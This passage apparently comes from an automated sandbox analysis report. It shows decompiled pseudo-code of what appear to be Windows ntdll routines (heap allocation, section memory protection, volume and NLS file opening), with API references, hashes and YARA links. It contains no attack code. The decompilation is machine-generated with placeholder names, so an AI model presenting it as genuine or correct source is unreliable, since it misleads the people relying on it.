												_a28 = 0x6ab41ab0;
											}
											if(_a32 == 0) {
												_a32 = 0x6ab41ab0;
											}
											if(_t276 == 0) {
												_t276 = 0x6ab41ab0;
												_a36 = 0x6ab41ab0;
											}
											if(_t273 == 0) {
												_t273 = 0x6ab41ab0;
											}
											_t209 = 3;
											_t278 = 0;
											_t228 = (( *_t207 & 0x0000ffff) + 0x00000005 & 0xfffffffc) + (( *(_t132 + 2) & 0x0000ffff) + _t209 & 0xfffffffc) + (( *_a8 & 0x0000ffff) + 0x00000005 & 0xfffffffc) + (( *(_a32 + 2) & 0x0000ffff) + _t209 & 0xfffffffc) + 0x4ac + (( *(_t276 + 2) & 0x0000ffff) + _t209 & 0xfffffffc);
											_v16 = _t228;
											if( *_t273 != 0) {
												_t228 = _t228 + (( *(_t273 + 2) & 0x0000ffff) + _t209 & 0xfffffffc);
												_v16 = _t228;
											}
											if(_t256 != 0) {
												_t229 = _t228 + (( *(_t256 + 2) & 0x0000ffff) + _t209 & 0xfffffffc);
												_v16 = _t229;
											}
											if(_a24 != _t278) {
												_t153 = E6AB9585B(_a24, 1);
												_t229 = _v16;
											} else {
												_t153 =  *((intOrPtr*)(_v24 + 0x290));
											}
											_v20 = _t153;
											_t211 = _t153 + 0x00000003 & 0xfffffffc;
											if(_t211 < _t153) {
												L77:
												_t126 = 0xc0000095;
												goto L51;
											} else {
												while(1) {
													_t154 = _t211 + _t229;
													if(_t154 < _t229) {
														goto L77;
													}
													_t279 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), _t278, _t154);
													if(_t279 == 0) {
														_t126 = 0xc000009a;
														L51:
														L52:
														L53:
														return _t126;
													}
													_t158 = _t279 + _v16;
													_v12 = _t158;
													if(_a24 != 0) {
														memcpy(_t158, _a24, _v20);
														L42:
														memset(_t279, 0, 0x2a4);
														_t162 = _v16;
														 *_t279 = _t162;
														 *(_t279 + 4) = _t162;
														 *(_t279 + 0x290) = _t211;
														 *((intOrPtr*)(_t279 + 0xc)) = 0;
														_t53 = _t279 + 0x24; // 0x24
														_t212 = _t53;
														 *((intOrPtr*)(_t279 + 0x2c)) = 0;
														 *((intOrPtr*)(_t279 + 0x48)) = _v12;
														_t57 = _t279 + 0x2a4; // 0x2a4
														_v12 = _t57;
														 *((intOrPtr*)(_t279 + 8)) = 1;
														 *(_t279 + 0x14) =  *(_v24 + 0x14) & 1;
														_t169 = _a16;
														if(_a16 == 0) {
															L6AB7EEF0(0x6ac579a0);
															E6AB66C14( &_v12, _t212, _v24 + 0x24, 0x208);
															E6AB7EB70( &_v12, 0x6ac579a0);
														} else {
															E6AB66C14( &_v12, _t212, _t169, 0x208);
															if(_v5 != 0) {
																_t268 = 0x5c;
																 *((short*)( *((intOrPtr*)(_t279 + 0x28)) + _v32 * 2)) = _t268;
																_t194 = 2;
																 *_t212 =  *_t212 + _t194;
															}
														}
														_t234 = _a12;
														if(_a12 != 0) {
															_t104 = _t279 + 0x30; // 0x30
															E6AB66C14( &_v12, _t104, _t234,  *(_t234 + 2) & 0x0000ffff);
														}
														_t72 = _t279 + 0x38; // 0x38
														E6AB66C14( &_v12, _t72, _a8, ( *_a8 & 0x0000ffff) + 2);
														_t213 = _a20;
														_t75 = _t279 + 0x40; // 0x40
														_t262 = _t75;
														_t238 =  *_t213 & 0x0000ffff;
														_t180 = _t213[1] & 0x0000ffff;
														if(_t238 != (_t213[1] & 0x0000ffff)) {
															_t180 = _t238 + 2;
														}
														E6AB66C14( &_v12, _t262, _t213, _t180);
														_t80 = _t279 + 0x70; // 0x70
														E6AB66C14( &_v12, _t80, _a28,  *(_a28 + 2) & 0x0000ffff);
														_t84 = _t279 + 0x78; // 0x78
														E6AB66C14( &_v12, _t84, _a32,  *(_a32 + 2) & 0x0000ffff);
														_t88 = _t279 + 0x80; // 0x80
														E6AB66C14( &_v12, _t88, _a36,  *(_a36 + 2) & 0x0000ffff);
														if( *_t273 != 0) {
															_t118 = _t279 + 0x88; // 0x88
															E6AB66C14( &_v12, _t118, _t273,  *(_t273 + 2) & 0x0000ffff);
														}
														if((_a44 & 0x00000001) == 0) {
															_t279 = E6ABEBCB0(_t279);
														}
														_t126 = 0;
														 *_a4 = _t279;
														goto L51;
													}
													L6AB7EEF0(0x6ac579a0);
													_t269 = _v24;
													_t196 =  *(_t269 + 0x290);
													_v20 = _t196;
													_t251 = _t196 + 0x00000003 & 0xfffffffc;
													_v28 = _t196 + 0x00000003 & 0xfffffffc;
													if(_t196 > _t211) {
														E6AB7EB70(_t251, 0x6ac579a0);
														_t278 = 0;
														RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t279);
														_t211 = _v28;
														_t229 = _v16;
														if(_t211 >= _v20) {
															continue;
														}
														goto L77;
													}
													memcpy(_v12,  *(_t269 + 0x48), _t196);
													E6AB7EB70(_t251, 0x6ac579a0);
													_t211 = _v28;
													goto L42;
												}
												goto L77;
											}
										}
									}
								}
							}
						}
					}
					_t271 = ( *_t217 & 0x0000ffff) >> 1;
					_v32 = _t271;
					if(E6AB66BF3(_t217) < 0 || _t271 == 0) {
						goto L65;
					} else {
						if( *((intOrPtr*)(_t217[2] + _t271 * 2 - 2)) == _t206) {
							L11:
							_t256 = _a12;
							goto L12;
						}
						if(_t271 > 0x103) {
							goto L65;
						}
						_v5 = 1;
						goto L11;
					}
				}
			}

0x6ab66800
0x6ab66800
0x6ab66800
0x6ab6680f
0x6abc1b26
0x00000000
0x6abc1b26
0x6ab66821
0x6ab6682b
0x00000000
0x00000000
0x6ab66831
0x6ab66834
0x6ab66838
0x6ab66b68
0x6ab66b6d
0x6ab6683e
0x6ab6683e
0x6ab6683e
0x6ab66842
0x00000000
0x6ab66848
0x6ab66848
0x6ab66849
0x6ab6684c
0x6ab6684f
0x6ab66854
0x6ab66857
0x6ab66893
0x6ab66893
0x6ab66898
0x6abc1b30
0x6ab6689e
0x6ab668a0
0x6ab668a0
0x6ab668a7
0x6abc1b47
0x6abc1b47
0x00000000
0x6ab668ad
0x6ab668ad
0x6ab668b2
0x6abc1b37
0x6abc1b39
0x6ab668b8
0x6ab668b8
0x6ab668bd
0x6ab668bd
0x6ab668c1
0x00000000
0x6ab668c7
0x6ab668c7
0x6ab668cc
0x6abc1b40
0x6ab668d2
0x6ab668d4
0x6ab668d9
0x6ab668d9
0x6ab668dd
0x00000000
0x6ab668e3
0x6ab668e3
0x6ab668e4
0x6ab668e9
0x6abc1b51
0x6ab668ef
0x6ab668f1
0x6ab668f6
0x6ab668f6
0x6ab668fa
0x6abc1b58
0x00000000
0x6ab66900
0x6ab66900
0x6ab66901
0x6ab66906
0x6abc1b62
0x6ab6690c
0x6ab6690e
0x6ab6690e
0x6ab66915
0x6abc1b69
0x00000000
0x6ab6691b
0x6ab6691d
0x6abc1b73
0x6abc1b76
0x6abc1b76
0x6ab66923
0x6ab6692d
0x6abc1b7e
0x6abc1b80
0x6abc1b80
0x6ab66937
0x6abc1b88
0x6abc1b88
0x6ab6693f
0x6abc1b90
0x6abc1b92
0x6abc1b92
0x6ab66947
0x6abc1b9a
0x6abc1b9a
0x6ab66959
0x6ab6698f
0x6ab66991
0x6ab66993
0x6ab66999
0x6abc1baa
0x6abc1bac
0x6abc1bac
0x6ab669a1
0x6ab66b7d
0x6ab66b7f
0x6ab66b7f
0x6ab669aa
0x6ab66b8d
0x6ab66b92
0x6ab669b0
0x6ab669b3
0x6ab669b3
0x6ab669bc
0x6ab669bf
0x6ab669c4
0x6abc1bdf
0x6abc1bdf
0x00000000
0x6ab669ca
0x6ab669ca
0x6ab669ca
0x6ab669cf
0x00000000
0x00000000
0x6ab669e5
0x6ab669e9
0x6abc1c0f
0x6ab66b5d
0x6ab66b5e
0x6ab66b5f
0x00000000
0x6ab66b5f
0x6ab669f2
0x6ab669f8
0x6ab669fb
0x6ab66ba1
0x6ab66a44
0x6ab66a4d
0x6ab66a52
0x6ab66a57
0x6ab66a5a
0x6ab66a62
0x6ab66a68
0x6ab66a6b
0x6ab66a6b
0x6ab66a6e
0x6ab66a74
0x6ab66a77
0x6ab66a7d
0x6ab66a83
0x6ab66a8b
0x6ab66a8e
0x6ab66a93
0x6ab66bb3
0x6ab66bc9
0x6ab66bd3
0x6ab66a99
0x6ab66aa4
0x6ab66aad
0x6ab66ab7
0x6ab66aba
0x6ab66abe
0x6ab66abf
0x6ab66abf
0x6ab66aad
0x6ab66ac2
0x6ab66ac7
0x6ab66be1
0x6ab66be9
0x6ab66be9
0x6ab66ad0
0x6ab66ade
0x6ab66ae3
0x6ab66ae6
0x6ab66ae6
0x6ab66ae9
0x6ab66aec
0x6ab66af3
0x6ab66af5
0x6ab66af5
0x6ab66afd
0x6ab66b05
0x6ab66b11
0x6ab66b19
0x6ab66b25
0x6ab66b2d
0x6ab66b3c
0x6ab66b46
0x6abc1bed
0x6abc1bf8
0x6abc1bf8
0x6ab66b50
0x6abc1c08
0x6abc1c08
0x6ab66b59
0x6ab66b5b
0x00000000
0x6ab66b5b
0x6ab66a06
0x6ab66a0b
0x6ab66a0e
0x6ab66a14
0x6ab66a1a
0x6ab66a1d
0x6ab66a22
0x6abc1bb9
0x6abc1bc5
0x6abc1bcb
0x6abc1bd0
0x6abc1bd3
0x6abc1bd9
0x00000000
0x00000000
0x00000000
0x6abc1bd9
0x6ab66a2f
0x6ab66a3c
0x6ab66a41
0x00000000
0x6ab66a41
0x00000000
0x6ab669ca
0x6ab669c4
0x6ab66915
0x6ab668fa
0x6ab668dd
0x6ab668c1
0x6ab668a7
0x6ab6685c
0x6ab6685e
0x6ab66868
0x00000000
0x6ab66876
0x6ab6687e
0x6ab66890
0x6ab66890
0x00000000
0x6ab66890
0x6ab66886
0x00000000
0x00000000
0x6ab6688c
0x00000000
0x6ab6688c
0x6ab66868

APIs

RtlAllocateHeap.1105(?,00000000,?), ref: 6AB669E0
RtlEnterCriticalSection.1105(6AC579A0,?,00000000,?), ref: 6AB66A06
memcpy.1105(?,?,?,6AC579A0,?,00000000,?), ref: 6AB66A2F
RtlLeaveCriticalSection.1105(6AC579A0), ref: 6AB66A3C
memset.1105(00000000,00000000,000002A4,6AC579A0), ref: 6AB66A4D

Part of subcall function 6AB66C14: memcpy.1105(?,?,?,?,00000000,00000024,?,?,6AB66BCE,?,00000208,6AC579A0,?,?,6AC579A0), ref: 6AB66C39
Part of subcall function 6AB66C14: memset.1105(00000208,00000000,00000208,?,00000000,00000024,?,?,6AB66BCE,?,00000208,6AC579A0,?,?,6AC579A0), ref: 6AB66C71

RtlDeNormalizeProcessParams.1105(00000000,?,?,00000000,?,?,?,?,?,?,-00000002,?,00000208), ref: 6ABC1C03

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSectionmemcpymemset$AllocateEnterHeapLeaveNormalizeParamsProcess
String ID:
API String ID: 2315816726-0
Opcode ID: adba9adea93cbe1b7b2a0e72364748df49227d958d77d38a2aa90d4c95b24476
Instruction ID: 4fa11f29b5e1c69955446af8a053d34dd5a993fd39cd892b5f2efa693c4f9741
Opcode Fuzzy Hash: adba9adea93cbe1b7b2a0e72364748df49227d958d77d38a2aa90d4c95b24476
Instruction Fuzzy Hash: A2D1E671A00685DBCB18CF68C8A1AAE77B0EF05318F09452DE92AD7281FF35D945EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6ABE3C93, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 141
nativeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E6ABE3C93(intOrPtr __ecx, wchar_t* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				wchar_t* _v32;
				intOrPtr _v36;
				short _v38;
				void* _v40;
				void* _v48;
				void* _v56;
				void* __ebp;
				wchar_t* _t40;
				long _t43;
				long _t67;
				signed int _t72;
				intOrPtr _t75;
				signed short _t76;
				short _t78;
				intOrPtr _t79;
				void* _t80;
				signed short* _t81;
				intOrPtr _t84;
				void* _t85;
				void* _t89;

				_v12 = _v12 & 0x00000000;
				_t81 = __edx;
				_t79 = __ecx;
				_v24 = __ecx;
				_t40 = wcschr(__edx, 0x3d);
				if(_t40 == 0) {
					L25:
					__eflags = 0;
					return 0;
				}
				 *_t40 = 0;
				_t72 =  *_t81 & 0x0000ffff;
				_t87 = _t72 - 0x53;
				if(_t72 != 0x53) {
					__eflags = _t72 - 0x4f;
					if(_t72 != 0x4f) {
						goto L25;
					}
					_t43 = wcstoul( &(_t40[0]),  &_v32, 0x10);
					_t85 = _t85 + 0xc;
					_v12 = _t43;
					__eflags = _t43;
					if(__eflags == 0) {
						goto L25;
					}
					_t67 = 1;
					L6:
					_t80 = E6ABE3E74(_t79, _t87);
					if(_t80 == 0) {
						goto L25;
					}
					_t75 = 0;
					_t84 = ( *(_t80 + 0x14) & 0x0000ffff) + 0x18 + _t80;
					_t89 = 0 -  *(_t80 + 6);
					while(1) {
						_v8 = _t75;
						if(_t89 >= 0) {
							break;
						}
						_t78 = 8;
						if( *((intOrPtr*)(_t84 + 0xc)) == 0 ||  *((intOrPtr*)(_t84 + 8)) == 0) {
							L23:
							_t75 = _t75 + 1;
							_t84 = _t84 + 0x28;
							_t89 = _t75 - ( *(_t80 + 6) & 0x0000ffff);
							continue;
						} else {
							if(_t67 != 0) {
								_t21 = _t75 + 1; // 0x2
								__eflags = _v12 - _t21;
								if(_v12 != _t21) {
									L21:
									__eflags = _t67;
									if(_t67 != 0) {
										goto L23;
									}
									L22:
									RtlFreeUnicodeString( &_v48);
									_t75 = _v8;
									goto L23;
								}
								L19:
								_v16 =  *((intOrPtr*)(_t84 + 8));
								_v20 =  *((intOrPtr*)(_t84 + 0xc)) + _v24;
								_push( &_v28);
								_push(_a4);
								_push( &_v16);
								_push( &_v20);
								_push(0xffffffff);
								E6ABA9A00();
								_push(_v28);
								_push(_v16);
								_push(_v20);
								E6ABF5720(0x55, 3, "Set 0x%X protection for %p section for %d bytes, old protection 0x%X\n", _a4);
								_t85 = _t85 + 0x1c;
								__eflags = _t67;
								if(_t67 != 0) {
									break;
								}
								_t75 = _v8;
								goto L21;
							}
							_t76 = 0;
							_v36 = _t84;
							_v38 = _t78;
							_v40 = 0;
							while( *((char*)((_t76 & 0x0000ffff) + _t84)) != 0) {
								_t76 = _t76 + 1;
								_v40 = _t76;
								if(_t76 < _t78) {
									continue;
								}
								break;
							}
							if(RtlAnsiStringToUnicodeString( &_v48,  &_v40, 1) < 0) {
								goto L25;
							}
							if(RtlCompareUnicodeString( &_v56,  &_v48, 1) == 0) {
								goto L19;
							}
							goto L22;
						}
					}
					return 1;
				}
				RtlInitUnicodeString( &_v56,  &(_t40[0]));
				_t67 = 0;
				goto L6;
			}

0x6abe3c9b
0x6abe3ca2
0x6abe3ca4
0x6abe3ca9
0x6abe3cac
0x6abe3cb5
0x6abe3e08
0x6abe3e08
0x00000000
0x6abe3e08
0x6abe3cbd
0x6abe3cc0
0x6abe3cc3
0x6abe3cc6
0x6abe3cd9
0x6abe3cdc
0x00000000
0x00000000
0x6abe3cec
0x6abe3cf1
0x6abe3cf4
0x6abe3cf7
0x6abe3cf9
0x00000000
0x00000000
0x6abe3cff
0x6abe3d01
0x6abe3d08
0x6abe3d0c
0x00000000
0x00000000
0x6abe3d1b
0x6abe3d1d
0x6abe3d1f
0x6abe3d23
0x6abe3d23
0x6abe3d26
0x00000000
0x00000000
0x6abe3d32
0x6abe3d33
0x6abe3df5
0x6abe3df9
0x6abe3dfa
0x6abe3dfd
0x00000000
0x6abe3d43
0x6abe3d45
0x6abe3d94
0x6abe3d97
0x6abe3d9a
0x6abe3de5
0x6abe3de5
0x6abe3de7
0x00000000
0x00000000
0x6abe3de9
0x6abe3ded
0x6abe3df2
0x00000000
0x6abe3df2
0x6abe3d9c
0x6abe3d9f
0x6abe3da8
0x6abe3dae
0x6abe3daf
0x6abe3db5
0x6abe3db9
0x6abe3dba
0x6abe3dbc
0x6abe3dc1
0x6abe3dc4
0x6abe3dc7
0x6abe3dd6
0x6abe3ddb
0x6abe3dde
0x6abe3de0
0x00000000
0x00000000
0x6abe3de2
0x00000000
0x6abe3de2
0x6abe3d47
0x6abe3d49
0x6abe3d4c
0x6abe3d50
0x6abe3d54
0x6abe3d5d
0x6abe3d5f
0x6abe3d66
0x00000000
0x00000000
0x00000000
0x6abe3d66
0x6abe3d79
0x00000000
0x00000000
0x6abe3d90
0x00000000
0x00000000
0x00000000
0x6abe3d92
0x6abe3d33
0x00000000
0x6abe3e04
0x6abe3cd0
0x6abe3cd5
0x00000000

APIs

wcschr.1105(?,0000003D,00000000,?), ref: 6ABE3CAC
RtlInitUnicodeString.1105(?,-00000002,00000000,?), ref: 6ABE3CD0
wcstoul.1105(-00000002,?,00000010,00000000,?), ref: 6ABE3CEC
RtlAnsiStringToUnicodeString.1105(?,?,00000001,00000000,?), ref: 6ABE3D72
RtlCompareUnicodeString.1105(?,?,00000001,?,?,00000001,00000000,?), ref: 6ABE3D89
ZwProtectVirtualMemory.1105(000000FF,?,?,00000000,?,00000000,?), ref: 6ABE3DBC
DbgPrintEx.1105(00000055,00000003,Set 0x%X protection for %p section for %d bytes, old protection 0x%X,00000000,?,?,?,000000FF,?,?,00000000,?,00000000,?), ref: 6ABE3DD6
RtlFreeUnicodeString.1105(?,00000000,?), ref: 6ABE3DED

Strings

Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 6ABE3DCD

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Unicode$AnsiCompareFreeInitMemoryPrintProtectVirtualwcschrwcstoul
String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X
API String ID: 1186784509-1979073566
Opcode ID: 2fcc78f9a6c2081488b96c96c26b381427a632cb2813d727bfe56b45a0165d47
Instruction ID: fc9d4e9033add0f1bf00d87ce0747096b401d37423570d18db069217afd99708
Opcode Fuzzy Hash: 2fcc78f9a6c2081488b96c96c26b381427a632cb2813d727bfe56b45a0165d47
Instruction Fuzzy Hash: A741E572D00289BADB10CBA4C841BEEF7B8FF04390F51802AE515E3191EF71DA45EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9F0BF, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 137
memorynativefileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E6AB9F0BF(signed short* __ecx, signed short __edx, void* __eflags, void** _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v68;
				void* _v72;
				intOrPtr _v76;
				void* _t51;
				signed short _t82;
				short _t84;
				signed int _t91;
				void* _t97;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				void* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E6AB84120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t108 = E6ABA9830();
					RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v44);
						_push( &_v52);
						_push(_v68);
						_t108 = E6ABA9990();
						if(_t108 < 0) {
							L10:
							_push(_v68);
							E6ABA95D0();
							goto L11;
						} else {
							_t109 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								_t97 = _t21;
								 *((intOrPtr*)(_t109 + 4)) = _v76;
								 *_t109 = 1;
								 *(_t109 + 0x10) = _t97;
								 *(_t109 + 0xe) = _t82;
								 *(_t109 + 8) = _v72;
								 *((intOrPtr*)(_t109 + 0x14)) = _v48;
								memcpy(_t97, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *(_t109 + 0x10) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v76);
										E6ABA95D0();
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)( *(_t109 + 0x10) + _t100)) = _t84;
										 *((short*)( *(_t109 + 0x10) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x6ab9f0d3
0x6ab9f0d9
0x6ab9f0e0
0x6ab9f0e7
0x6ab9f0f2
0x6ab9f0f4
0x6ab9f0f8
0x6ab9f100
0x6ab9f108
0x6ab9f10d
0x6ab9f115
0x6ab9f116
0x6ab9f11f
0x6ab9f123
0x6ab9f124
0x6ab9f12c
0x6ab9f130
0x6ab9f144
0x6ab9f14b
0x6ab9f152
0x6abdbab0
0x6abdbab0
0x6ab9f158
0x6ab9f158
0x6ab9f15a
0x6ab9f160
0x6ab9f165
0x6ab9f166
0x6ab9f16f
0x6ab9f173
0x6abdbaa7
0x6abdbaa7
0x6abdbaab
0x00000000
0x6ab9f179
0x6ab9f18d
0x6ab9f191
0x6abdbaa2
0x00000000
0x6ab9f197
0x6ab9f19b
0x6ab9f19b
0x6ab9f1a2
0x6ab9f1a9
0x6ab9f1af
0x6ab9f1b2
0x6ab9f1b6
0x6ab9f1b9
0x6ab9f1c4
0x6ab9f1d8
0x6ab9f1df
0x6ab9f1e3
0x6ab9f1eb
0x6ab9f1ee
0x6ab9f1f4
0x6ab9f20f
0x6abdbab7
0x6abdbabb
0x6abdbacc
0x6abdbad1
0x6ab9f215
0x6ab9f218
0x6ab9f226
0x6ab9f22b
0x00000000
0x6ab9f22b
0x6ab9f1f6
0x6ab9f1f6
0x6ab9f1f9
0x6ab9f1fb
0x6ab9f1fb
0x6ab9f1f4
0x6ab9f191
0x6ab9f173
0x6ab9f152
0x6ab9f203

APIs

ZwOpenFile.1105(?,?,?,00000021,00100020,?), ref: 6AB9F134
RtlFreeHeap.1105(?,00000000,?,?,?,?,00000021,00100020,?), ref: 6AB9F14B
ZwQueryVolumeInformationFile.1105(00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021,00100020,?), ref: 6AB9F16A
RtlAllocateHeap.1105(?,00000000,?,00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021,00100020,?), ref: 6AB9F188
memcpy.1105(00000018,00100000,00000000,00000000,?,00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021), ref: 6AB9F1C4
ZwClose.1105(00000000,00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021,00100020,?), ref: 6ABDBAAB
ZwClose.1105(?,?,?,?,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6AC579A0,6AC579A0), ref: 6ABDBABB
RtlFreeHeap.1105(?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000), ref: 6ABDBACC

Strings

@, xrefs: 6AB9F124

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CloseFileFree$AllocateInformationOpenQueryVolumememcpy
String ID: @
API String ID: 3376599671-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 9f9f9d2f25417256e076f9feff447dfa30a102900294b550c87c7ad2545ab8d3
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: B2519E71505750AFC320CF29C840A6BBBF8FF48714F11892DF995876A1EBB4E904EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6AC16369, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 113
nativefileCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E6AC16369(char* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr* _a4) {
				signed int _v12;
				short _v536;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v556;
				char _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				char _v584;
				void* _v592;
				char _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t33;
				char* _t50;
				intOrPtr* _t52;
				intOrPtr* _t63;
				signed int _t65;

				_v12 =  *0x6ac5d360 ^ _t65;
				_t52 = _a4;
				_t63 = __edx;
				_t64 = __ecx;
				_t62 = 0x100;
				if(E6ABFCD55( &_v536, 0x100, L"\\SystemRoot\\Globalization\\") < 0) {
					L11:
					_t33 = 0xc0000001;
					L12:
					return E6ABAB640(_t33, _t52, _v12 ^ _t65, _t62, _t63, _t64);
				}
				_t64 = 0x100;
				_t62 = 0x100;
				if(E6AC083B1( &_v536, 0x100, __ecx) < 0) {
					goto L11;
				}
				_t62 = 0x100;
				if(E6AC083B1( &_v536, 0x100, L".nlp") < 0) {
					goto L11;
				}
				RtlInitUnicodeString( &_v592,  &_v536);
				_v584 = 0x18;
				_push(0);
				_v580 = 0;
				_v576 =  &_v592;
				_push(1);
				_push( &_v600);
				_v572 = 0x40;
				_push( &_v584);
				_push(0x80100000);
				_v568 = 0;
				_push( &_v540);
				_v564 = 0;
				_t64 = E6ABA9830();
				if(_t64 >= 0) {
					_t62 =  &_v560;
					if(E6AC160A2(_v540,  &_v560) < 0 || _v556 != 0) {
						_t64 = 0xc0000001;
					} else {
						_push(_v540);
						_push(0x8000000);
						_push(2);
						 *_t52 = _v560;
						_t52 = 0;
						_push(0);
						_push(0);
						_push(0xf0005);
						_push( &_v544);
						_t64 = E6ABA99A0();
						if(_t64 >= 0) {
							_push(2);
							_push(0);
							_push(1);
							 *_t63 = 0;
							_push( &_v548);
							_push(0);
							_push(0);
							_push(0);
							_push(_t63);
							_push(0xffffffff);
							_push(_v544);
							_v548 = 0;
							_t50 = E6ABA9780();
							_push(_v544);
							_t64 = _t50;
							E6ABA95D0();
						}
					}
					_push(_v540);
					E6ABA95D0();
				}
				_t33 = _t64;
				goto L12;
			}

0x6ac1637b
0x6ac1637f
0x6ac16384
0x6ac16386
0x6ac1638d
0x6ac1639f
0x6ac164e3
0x6ac164e3
0x6ac164e8
0x6ac164f8
0x6ac164f8
0x6ac163a6
0x6ac163b1
0x6ac163ba
0x00000000
0x00000000
0x6ac163c5
0x6ac163d4
0x00000000
0x00000000
0x6ac163e8
0x6ac163ef
0x6ac163f9
0x6ac16400
0x6ac16406
0x6ac16412
0x6ac16414
0x6ac1641b
0x6ac16425
0x6ac16426
0x6ac16431
0x6ac16437
0x6ac16438
0x6ac16443
0x6ac16447
0x6ac16453
0x6ac16460
0x6ac164cf
0x6ac1646b
0x6ac1646b
0x6ac16477
0x6ac1647c
0x6ac1647e
0x6ac16480
0x6ac16482
0x6ac16483
0x6ac16484
0x6ac1648f
0x6ac16495
0x6ac16499
0x6ac1649b
0x6ac1649d
0x6ac1649e
0x6ac164a6
0x6ac164a8
0x6ac164a9
0x6ac164aa
0x6ac164ab
0x6ac164ac
0x6ac164ad
0x6ac164af
0x6ac164b5
0x6ac164bb
0x6ac164c0
0x6ac164c6
0x6ac164c8
0x6ac164c8
0x6ac16499
0x6ac164d4
0x6ac164da
0x6ac164da
0x6ac164df
0x00000000

APIs

RtlInitUnicodeString.1105(?,?,.nlp,?,\SystemRoot\Globalization\,?,00000000,?), ref: 6AC163E8
ZwOpenFile.1105(?,80100000,00000018,?,00000001,00000000,?,?,.nlp,?,\SystemRoot\Globalization\,?,00000000,?), ref: 6AC1643E

Part of subcall function 6AC160A2: ZwQueryInformationFile.1105(?,00000001,?,00000018,00000005,00000000,?,00000001,00000000,?,?,.nlp,?,\SystemRoot\Globalization\,?,00000000), ref: 6AC160C4

